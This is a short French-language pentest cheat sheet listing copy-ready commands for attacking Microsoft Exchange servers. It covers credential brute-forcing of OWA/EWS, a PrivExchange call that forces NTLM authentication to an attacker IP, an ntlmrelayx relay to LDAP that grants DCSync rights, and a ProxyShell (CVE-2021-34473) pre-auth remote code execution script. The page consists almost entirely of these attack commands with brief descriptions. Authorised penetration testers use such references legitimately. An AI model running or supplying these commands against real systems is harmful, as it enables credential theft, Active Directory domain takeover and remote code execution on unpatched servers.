Pre-Exploitation

Exchange / Outlook Attacks

PrivExchange, ProxyShell et relay NTLM via Exchange pour escalade domaine.

Copy command
nxc http $TARGET -u $USER -p $PASS -M exchange_brute

Description: Tester les creds sur OWA/EWS d'un serveur Exchange accessible.

Copy command
python3 privexchange.py -ah $ATTACKER_IP $EXCHANGE_SERVER -u $USER -p $PASS -d $DOMAIN

Description: PrivExchange : forcer Exchange à s'authentifier NTLM vers nous via l'API EWS.

Copy command
ntlmrelayx.py -t ldap://$DC --escalate-user $USER

Description: Relay le hash Exchange vers LDAP pour escalader l'utilisateur courant vers DCSync.

Copy command
python3 proxyshell.py -u https://$EXCHANGE_SERVER -e administrator@$DOMAIN

Description: ProxyShell (CVE-2021-34473) : RCE pré-auth sur Exchange non patché.